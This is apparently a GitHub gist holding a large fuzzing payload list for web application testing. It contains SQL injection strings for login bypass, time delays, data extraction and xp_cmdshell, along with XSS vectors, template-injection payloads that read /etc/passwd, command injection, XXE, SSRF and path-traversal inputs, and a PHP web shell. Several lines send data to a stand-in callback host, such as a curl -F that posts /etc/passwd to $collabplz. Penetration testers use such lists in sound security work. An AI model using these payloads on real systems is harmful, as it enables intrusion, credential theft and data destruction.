-
-
Save ahpaleus/e80654d82e718731e8b5385d5df56f2b to your computer and use it in GitHub Desktop.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'-' | |
' ' | |
'&' | |
'^' | |
'*' | |
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" | |
onmouseover=/*<svg/*/onload=alert()//> | |
' or ''-' | |
' or '' ' | |
' or ''&' | |
%00%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%22%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff | |
' or ''^' | |
$collabplz | |
http://$collabplz | |
...- .. .-. - ..- .- .-.. / . ...- . -. - /.-- . -.. -. . ... -.. .- -.-- / ..--- --... / --- -.-. - --- -... . .-. /-... .--. / .--. .-. . ... . -. - ... ---... / -.. .-. / -.. .- ...- .. -.. / .- -... .-. ..- - .- - /-... . / - .... . .-. . -.-.-- | |
https://$collabplz | |
{{url_for.__globals__}} | |
{{request.environ}} | |
{"1":["%01","<\\?php $a = $_REQUEST\\['r'];$output = `$a`;ec\\ho $output;?>"]} | |
{{config}} | |
`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}` | |
{{self}} | |
{{request|attr('__class__')}} | |
℀ | |
℁ | |
℅ | |
℆ | |
℀℁℅℆ | |
request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f] | |
ftp://$collabplz | |
</script>injected2<script>alert(1)//</script> | |
//$collabplz | |
\\$collabplz | |
smtp://$collabplz | |
+http://$collabplz+ | |
0://$collabplz:80;http://google.com:80/ | |
file://$collabplz | |
dict://$collabplz | |
sftp://$collabplz | |
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ | |
tftp://$collabplz | |
ldap://$collabplz | |
gopher://$collabplz | |
file:///etc/passwd | |
</script><script>alert(1)</script> | |
<style>/*</style><img src onerror=alert(1)>*/ | |
' or ''*' | |
"-" | |
" " | |
"&" | |
"^" | |
"*" | |
<esi:include src="http://$collabplz/" /><script>alert(1)</script> | |
" or ""-" | |
" or "" " | |
" or ""&" | |
" or ""^" | |
%00%00 | |
%00 | |
%00%0a%0d | |
%0d%0a%00 | |
%00%0d%0a | |
%00%00%00%00%00%00%00%00%00%00%00%00 | |
" or ""*" | |
or true-- | |
" or true-- | |
' or true-- | |
") or true-- | |
') or true-- | |
' or 'x'='x | |
') or ('x')=('x | |
1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.$collabplz\1.trc',default)) | |
1+and+exists(select+*+from+fn_trace_gettable('\\'%2baaaaa%2b'.$collabplz\1.trc',default)) | |
test+(<script>alert(0)</script>)@example.com | |
test@example(<script>alert(0)</script>).com | |
"<script>alert(0)</script>"@example.com | |
"<%=7*7%>"@example.com | |
test+(${{7*7}}@example.com | |
{{$a=7*7}} | |
"'OR1=1--'"@example.com | |
"mail');SLEEP+5;--"@example.com | |
test.test@[$collabplz] | |
test.test@[127.0.0.1] | |
victim&email=attacker@example.com | |
')) or (('x'))=(('x | |
";id;" | |
';id;' | |
c%3A..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fpath_traversal | |
"|id|" | |
'|id|' | |
"|/usr/bin/id|" | |
'|/usr/bin/id|' | |
"||/usr/bin/id|" | |
'||/usr/bin/id|' | |
"\n/bin/ls -al\n" | |
'\n/bin/ls -al\n' | |
%22%0A/usr/bin/id%0A%22 | |
%27%0A/usr/bin/id%0A%27 | |
"& ping -i 30 127.0.0.1 &" | |
'& ping -i 30 127.0.0.1 &' | |
"& ping -i 30 $collabplz &" | |
'& ping -i 30 $collabplz &' | |
" or "x"="x | |
") or ("x")=("x | |
<x v-html=_c.constructor('alert(1)')()> | |
")) or (("x"))=(("x | |
or 1=1 | |
or 1=1-- | |
or 1=1# | |
or 1=1/* | |
admin' -- | |
admin' # | |
admin'/* | |
admin' or '1'='1 | |
https://$collabplz</script><script>{{a=root.process.mainModule.require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" $collabplz')}}</script> | |
admin' or '1'='1'-- | |
admin' or '1'='1'# | |
admin' or '1'='1'/* | |
admin'or 1=1 or ''=' | |
admin' or 1=1 | |
${7*191} | |
${{7*191}} | |
{{7*191}} | |
<%= 7 * 191 %> | |
#{7*191} | |
{{7*'191'}} | |
{{7*191}}[[7*191]] | |
@(7*191) | |
admin' or 1=1-- | |
admin' or 1=1# | |
admin' or 1=1/* | |
admin') or ('1'='1 | |
admin') or ('1'='1'-- | |
admin') or ('1'='1'# | |
admin') or ('1'='1'/* | |
admin') or '1'='1 | |
admin') or '1'='1'-- | |
admin') or '1'='1'# | |
admin') or '1'='1'/* | |
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 | |
admin" -- | |
admin" # | |
admin"/* | |
admin" or "1"="1 | |
admin" or "1"="1"-- | |
admin" or "1"="1"# | |
<\\?php $a = $_REQUEST\\['r'];$output = `$a`;ec\\ho $output;?> | |
admin" or "1"="1"/* | |
admin"or 1=1 or ""=" | |
admin" or 1=1 | |
admin" or 1=1-- | |
admin" or 1=1# | |
admin" or 1=1/* | |
admin") or ("1"="1 | |
admin") or ("1"="1"-- | |
admin") or ("1"="1"# | |
admin") or ("1"="1"/* | |
admin") or "1"="1 | |
admin") or "1"="1"-- | |
admin") or "1"="1"# | |
admin") or "1"="1"/* | |
X-Custom-IP-Authorization | |
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 | |
== | |
= | |
</textarea></script><script>thr=new XMLHttpRequest();thr.open(‘GET’,’http://$collabplz/a'+document.location,true);thr.send(null);</script> | |
' | |
' -- | |
' # | |
' – | |
'-- | |
'/* | |
'# | |
" -- | |
" # | |
"/* | |
' and 1='1 | |
<%= system('cat /etc/passwd') %> | |
<%= `ls /` %> | |
<%= IO.popen('ls /').readlines() %> | |
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> | |
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> | |
' and a='a | |
or 1=1 | |
or true | |
' or ''=' | |
" or ""=" | |
1′) and '1′='1– | |
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 | |
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 | |
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}` | |
and 1=1 | |
and 1=1– | |
' and 'one'='one | |
' and 'one'='one– | |
' group by password having 1=1-- | |
' group by userid having 1=1-- | |
' group by username having 1=1-- | |
like '%' | |
or 0=0 -- | |
or 0=0 # | |
or 0=0 – | |
' or 0=0 # | |
' or 0=0 -- | |
' or 0=0 # | |
' or 0=0 – | |
" or 0=0 -- | |
" or 0=0 # | |
" or 0=0 – | |
%' or '0'='0 | |
or 1=1 | |
or 1=1-- | |
or 1=1/* | |
or 1=1# | |
or 1=1– | |
' or 1=1-- | |
' or '1'='1 | |
' or '1'='1'-- | |
' or '1'='1'/* | |
' or '1'='1'# | |
' or '1′='1 | |
' or 1=1 | |
' or 1=1 -- | |
' or 1=1 – | |
' or 1=1-- | |
' or 1=1;# | |
' or 1=1/* | |
' or 1=1# | |
' or 1=1– | |
') or '1'='1 | |
') or '1'='1-- | |
') or '1'='1'-- | |
') or '1'='1'/* | |
') or '1'='1'# | |
') or ('1'='1 | |
') or ('1'='1-- | |
') or ('1'='1'-- | |
') or ('1'='1'/* | |
{{{}.")));alert(1)//"}} | |
') or ('1'='1'# | |
'or'1=1 | |
'or'1=1′ | |
" or "1"="1 | |
" or "1"="1"-- | |
" or "1"="1"/* | |
" or "1"="1"# | |
" or 1=1 | |
" or 1=1 -- | |
" or 1=1 – | |
" or 1=1-- | |
" or 1=1/* | |
" or 1=1# | |
" or 1=1– | |
") or "1"="1 | |
") or "1"="1"-- | |
") or "1"="1"/* | |
") or "1"="1"# | |
") or ("1"="1 | |
") or ("1"="1"-- | |
") or ("1"="1"/* | |
") or ("1"="1"# | |
) or '1′='1– | |
) or ('1′='1– | |
' or 1=1 LIMIT 1;# | |
'or 1=1 or ''=' | |
"or 1=1 or ""=" | |
' or 'a'='a | |
' or a=a-- | |
' or a=a– | |
') or ('a'='a | |
" or "a"="a | |
") or ("a"="a | |
') or ('a'='a and hi") or ("a"="a | |
' or 'one'='one | |
' or 'one'='one– | |
' or uid like '% | |
' or uname like '% | |
' or userid like '% | |
' or user like '% | |
' or username like '% | |
' or 'x'='x | |
') or ('x'='x | |
" or "x"="x | |
' OR 'x'='x'#; | |
'=' 'or' and '=' 'or' | |
' UNION ALL SELECT 1, @@version;# | |
' UNION ALL SELECT system_user(),user();# | |
' UNION select table_schema,table_name FROM information_Schema.tables;# | |
admin' and substring(password/text(),1,1)='7 | |
' and substring(password/text(),1,1)='7 | |
' or 1=1 limit 1 -- -+ | |
'="or' | |
alert`1` | |
alert(1) | |
alert(1) | |
alert(1) | |
(alert)(1) | |
a=alert,a(1) | |
[1].find(alert) | |
top["al"+"ert"](1) | |
top[/al/.source+/ert/.source](1) | |
al\u0065rt(1) | |
top['al\145rt'](1) | |
top['al\x65rt'](1) | |
http(s)://.../?locals[system("ls")] | |
http(s)://.../?locals[system("wget http://$collabplz")] | |
http(s)://.../?locals[system("host $collabplz ")] | |
top[8680439..toString(30)](1) | |
navigator.vibrate(500) | |
eval(URL.slice(-8))>#alert(1) | |
eval(location.hash.slice(1)>#alert(1) | |
innerHTML=location.hash>#<script>alert(1)</script> | |
<svg onload=alert(1)> | |
"><svg onload=alert(1)// | |
"onmouseover=alert(1)// | |
"autofocus/onfocus=alert(1)// | |
'-alert(1)-' | |
'-alert(1)// | |
\'-alert(1)// | |
</script><svg onload=alert(1)> | |
<x contenteditable onblur=alert(1)>lose focus! | |
<x onclick=alert(1)>click this! | |
<x oncopy=alert(1)>copy this! | |
<x oncontextmenu=alert(1)>right click this! | |
<x oncut=alert(1)>copy this! | |
<x ondblclick=alert(1)>double click this! | |
<x ondrag=alert(1)>drag this! | |
<x contenteditable onfocus=alert(1)>focus this! | |
<x contenteditable oninput=alert(1)>input here! | |
<x contenteditable onkeydown=alert(1)>press any key! | |
<x contenteditable onkeypress=alert(1)>press any key! | |
<x contenteditable onkeyup=alert(1)>press any key! | |
<x onmousedown=alert(1)>click this! | |
<x onmousemove=alert(1)>hover this! | |
<x onmouseout=alert(1)>hover this! | |
<x onmouseover=alert(1)>hover this! | |
<x onmouseup=alert(1)>click this! | |
<x contenteditable onpaste=alert(1)>paste here! | |
<script>alert(1)// | |
<script>alert(1)<!– | |
<script src=//brutelogic.com.br/1.js> | |
<script src=//3334957647/1> | |
%3Cx onxxx=alert(1) | |
<%78 onxxx=1 | |
<x %6Fnxxx=1 | |
<x o%6Exxx=1 | |
<x on%78xx=1 | |
<x onxxx%3D1 | |
<X onxxx=1 | |
<x OnXxx=1 | |
<X OnXxx=1 | |
<x onxxx=1 onxxx=1 | |
<x/onxxx=1 | |
<x%09onxxx=1 | |
<x%0Aonxxx=1 | |
<x%0Conxxx=1 | |
<x%0Donxxx=1 | |
<x%2Fonxxx=1 | |
<x 1='1'onxxx=1 | |
<x 1="1"onxxx=1 | |
<x </onxxx=1 | |
<x 1=">" onxxx=1 | |
<http://onxxx%3D1/ | |
<x onxxx=alert(1) 1=' | |
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | |
'onload=alert(1)><svg/1=' | |
'>alert(1)</script><script/1=' | |
{{[]."-alert`1`-"}} | |
*/alert(1)</script><script>/* | |
*/alert(1)">'onload="/*<svg/1=' | |
`-alert(1)">'onload="`<svg/1=' | |
\\\\$collabplz\share | |
*/</script>'>alert(1)/*<script/1=' | |
<script>alert(1)</script> | |
<script src=javascript:alert(1)> | |
<iframe src=javascript:alert(1)> | |
<embed src=javascript:alert(1)> | |
<a href=javascript:alert(1)>click | |
<math><brute href=javascript:alert(1)>click | |
<form action=javascript:alert(1)><input type=submit> | |
<isindex action=javascript:alert(1) type=submit value=click> | |
<form><button formaction=javascript:alert(1)>click | |
<form><input formaction=javascript:alert(1) type=submit value=click> | |
<form><input formaction=javascript:alert(1) type=image value=click> | |
<form><input formaction=javascript:alert(1) type=image src=SOURCE> | |
<isindex formaction=javascript:alert(1) type=submit value=click> | |
<object data=javascript:alert(1)> | |
<iframe srcdoc=<svg/onload=alert(1)>> | |
<svg><script xlink:href=data:,alert(1) /> | |
<math><brute xlink:href=javascript:alert(1)>click | |
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | |
<html ontouchstart=alert(1)> | |
<html ontouchend=alert(1)> | |
<html ontouchmove=alert(1)> | |
<html ontouchcancel=alert(1)> | |
<body onorientationchange=alert(1)> | |
"><img src=1 onerror=alert(1)>.gif | |
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | |
%n%n%n%n%n | |
%999999999c | |
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | |
<script src="data:,alert(1)// | |
"><script src=data:,alert(1)// | |
<script src="//brutelogic.com.br/1.js# | |
"><script src=//brutelogic.com.br/1.js# | |
<link rel=import href="data:text/html,<script>alert(1)</script> | |
"><link rel=import href=data:text/html,<script>alert(1)</script> | |
<base href=//0> | |
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | |
<body onload=alert(1)> | |
<body onpageshow=alert(1)> | |
<body onfocus=alert(1)> | |
<body onhashchange=alert(1)><a href=#x>click this!#x | |
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | |
<body onscroll=alert(1)><br><br><br><br> | |
<body onresize=alert(1)>press F12! | |
<body onhelp=alert(1)>press F1! (MSIE) | |
<marquee onstart=alert(1)> | |
https://attacker.com</script><script>{{a=root.process.mainModule.require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" $collabplz')}}</script> | |
<marquee loop=1 width=0 onfinish=alert(1)> | |
<audio src onloadstart=alert(1)> | |
<video onloadstart=alert(1)><source> | |
<input autofocus onblur=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<form onsubmit=alert(1)><input type=submit> | |
<select onchange=alert(1)><option>1<option>2 | |
<menu id=x contextmenu=x onshow=alert(1)>right click me! | |
/usr/pkg/etc/httpd/httpd.conf | |
/usr/local/etc/apache22/httpd.conf | |
/usr/local/etc/apache2/httpd.conf | |
/var/www/conf/httpd.conf | |
/var/www/logs/error_log | |
/var/www/logs/access_log | |
/etc/apache2/httpd2.conf | |
/var/apache2/logs/error_log | |
/var/apache2/logs/access_log | |
/var/log/httpd-error.log | |
/var/log/httpd-access.log | |
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}} | |
/var/log/httpd/error_log | |
/var/log/httpd/access_log waitfor delay '0:0:20' /* | |
waitfor delay '0:0:20' -- | |
' waitfor delay '0:0:20' /* | |
' waitfor delay '0:0:20' -- | |
" waitfor delay '0:0:20' /* | |
" waitfor delay '0:0:20' -- | |
) waitfor delay '0:0:20' /* | |
) waitfor delay '0:0:20' -- | |
)) waitfor delay '0:0:20' /* | |
)) waitfor delay '0:0:20' -- | |
))) waitfor delay '0:0:20' /* | |
))) waitfor delay '0:0:20' -- | |
)))) waitfor delay '0:0:20' /* | |
)))) waitfor delay '0:0:20' -- | |
))))) waitfor delay '0:0:20' -- | |
)))))) waitfor delay '0:0:20' -- | |
') waitfor delay '0:0:20' /* | |
') waitfor delay '0:0:20' -- | |
") waitfor delay '0:0:20' /* | |
") waitfor delay '0:0:20' -- | |
')) waitfor delay '0:0:20' /* | |
')) waitfor delay '0:0:20' -- | |
")) waitfor delay '0:0:20' /* | |
")) waitfor delay '0:0:20' -- | |
'))) waitfor delay '0:0:20' /* | |
'))) waitfor delay '0:0:20' -- | |
"))) waitfor delay '0:0:20' /* | |
"))) waitfor delay '0:0:20' -- | |
')))) waitfor delay '0:0:20' /* | |
')))) waitfor delay '0:0:20' -- | |
")))) waitfor delay '0:0:20' /* | |
")))) waitfor delay '0:0:20' -- | |
'))))) waitfor delay '0:0:20' /* | |
'))))) waitfor delay '0:0:20' -- | |
"))))) waitfor delay '0:0:20' /* | |
"))))) waitfor delay '0:0:20' -- | |
')))))) waitfor delay '0:0:20' /* | |
')))))) waitfor delay '0:0:20' -- | |
")))))) waitfor delay '0:0:20' /* | |
")))))) waitfor delay '0:0:20' --# you will need to customize/modify some of the vaules in the queries for best effect | |
'; exec master..xp_cmdshell 'ping 10.10.1.2'-- | |
'create user name identified by 'pass123' -- | |
'create user name identified by pass123 temporary tablespace temp default tablespace users; | |
' ; drop table temp -- | |
'exec sp_addlogin 'name' , 'password' -- | |
' exec sp_addsrvrolemember 'name' , 'sysadmin' -- | |
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- | |
' grant connect to name; grant resource to name; -- | |
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) | |
' or 1=1 -- | |
' union (select @@version) -- | |
' union (select NULL, (select @@version)) -- | |
' union (select NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- | |
# ms-sqli info disclosure payload fuzzfile | |
# replace regex with your fuzzer for best results <attackerip> <sharename> | |
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim | |
# might need to terminate payloads with ;-- | |
select @@version | |
select @@servernamee | |
select @@microsoftversione | |
select * from master..sysserverse | |
select * from sysusers | |
exec master..xp_cmdshell 'ipconfig+/all' | |
exec master..xp_cmdshell 'net+view' | |
exec master..xp_cmdshell 'net+users' | |
exec master..xp_cmdshell 'ping+<attackerip>' | |
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' | |
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"-- | |
1'1 | |
1 exec sp_ (or exec xp_) | |
1 and 1=1 | |
1' and 1=(select count(*) from tablenames); -- | |
1 or 1=1 | |
1' or '1'='1 | |
and 0=benchmark(3000000,MD5(1))%20/* | |
and 0=benchmark(3000000,MD5(1))%20-- | |
and 0=benchmark(3000000,MD5(1))%20%23 | |
' and 0=benchmark(3000000,MD5(1))%20/* | |
' and 0=benchmark(3000000,MD5(1))%20-- | |
' and 0=benchmark(3000000,MD5(1))%20%23 | |
" and 0=benchmark(3000000,MD5(1))%20/* | |
" and 0=benchmark(3000000,MD5(1))%20-- | |
" and 0=benchmark(3000000,MD5(1))%20%23 | |
) and 0=benchmark(3000000,MD5(1))%20/* | |
) and 0=benchmark(3000000,MD5(1))%20-- | |
) and 0=benchmark(3000000,MD5(1))%20%23 | |
)) and 0=benchmark(3000000,MD5(1))%20/* | |
)) and 0=benchmark(3000000,MD5(1))%20-- | |
)) and 0=benchmark(3000000,MD5(1))%20%23 | |
))) and 0=benchmark(3000000,MD5(1))%20/* | |
))) and 0=benchmark(3000000,MD5(1))%20-- | |
))) and 0=benchmark(3000000,MD5(1))%20%23 | |
)))) and 0=benchmark(3000000,MD5(1))%20/* | |
)))) and 0=benchmark(3000000,MD5(1))%20-- | |
)))) and 0=benchmark(3000000,MD5(1))%20%23 | |
') and 0=benchmark(3000000,MD5(1))%20/* | |
') and 0=benchmark(3000000,MD5(1))%20-- | |
') and 0=benchmark(3000000,MD5(1))%20%23 | |
") and 0=benchmark(3000000,MD5(1))%20/* | |
") and 0=benchmark(3000000,MD5(1))%20-- | |
") and 0=benchmark(3000000,MD5(1))%20%23 | |
')) and 0=benchmark(3000000,MD5(1))%20/* | |
')) and 0=benchmark(3000000,MD5(1))%20-- | |
')) and 0=benchmark(3000000,MD5(1))%20%23 | |
")) and 0=benchmark(3000000,MD5(1))%20/* | |
")) and 0=benchmark(3000000,MD5(1))%20-- | |
")) and 0=benchmark(3000000,MD5(1))%20%23 | |
'))) and 0=benchmark(3000000,MD5(1))%20/* | |
'))) and 0=benchmark(3000000,MD5(1))%20-- | |
'))) and 0=benchmark(3000000,MD5(1))%20%23 | |
"))) and 0=benchmark(3000000,MD5(1))%20/* | |
"))) and 0=benchmark(3000000,MD5(1))%20-- | |
"))) and 0=benchmark(3000000,MD5(1))%20%23 | |
')))) and 0=benchmark(3000000,MD5(1))%20/* | |
')))) and 0=benchmark(3000000,MD5(1))%20-- | |
')))) and 0=benchmark(3000000,MD5(1))%20%23 | |
")))) and 0=benchmark(3000000,MD5(1))%20/* | |
")))) and 0=benchmark(3000000,MD5(1))%20-- | |
")))) and 0=benchmark(3000000,MD5(1))%20%23# mysql local file disclosure through sqli | |
# fuzz interesting absolute filepath/filename into <filepath> | |
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile; | |
# contains statements from jbrofuzz | |
’ or ‘1’=’1 | |
' or '1'='1 | |
'||utl_http.request('httP://192.168.1.1/')||' | |
' || myappadmin.adduser('admin', 'newpass') || ' | |
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.$collabplz/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.$collabplz/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.$collabplz/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.$collabplz/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.$collabplz/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.$collabplz/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.$collabplz/"/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://xxe-xsi-nonamespaceschemalocation.$collabplz/"/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="http://xxe-xsinclude-schemalocation.$collabplz/"/></xs:schema> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include namespace="http://xxe-xsinclude-namespace.$collabplz/"/></xs:schema> | |
